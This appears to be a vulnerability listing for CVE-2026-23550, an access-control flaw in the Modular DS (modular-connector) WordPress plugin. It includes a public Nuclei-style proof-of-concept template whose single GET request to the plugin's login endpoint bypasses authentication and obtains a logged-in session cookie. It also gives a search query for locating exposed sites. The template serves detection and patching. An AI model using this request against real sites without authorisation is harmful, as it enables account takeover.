漏洞描述
Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
CVE-2026-23550: Modular DS - Broken Access Control
PoC代码[已公开]
id: CVE-2026-23550
info:
name: Modular DS - Broken Access Control
author: DhiyaneshDk
severity: high
description: |
Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
impact: |
Attackers can escalate their privileges, potentially gaining unauthorized access to sensitive functions or data.
remediation: |
Update to the latest version beyond 2.5.1.
reference:
- https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/
- https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability
metadata:
verified: true
max-request: 1
fofa-query: body="/plugins/modular-connector/"
tags: cve,cve2026,wordpress,wp-plugin,wp,auth-bypass,modular-connector,vkev
variables:
string: "{{to_lower(rand_text_alpha(5))}}"
http:
- method: GET
path:
- "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo"
- "{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo"
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
# digest: 4a0a00473045022100c46495eb5fe71644479d0feb21339e99a6f869f87692322e2e7e35f9068a08be022069850f178d71c1299402fe646c184201d6c22ecce1ba557dd434fcdf5c012e49:922c64590222798bb761d5b6d8e72950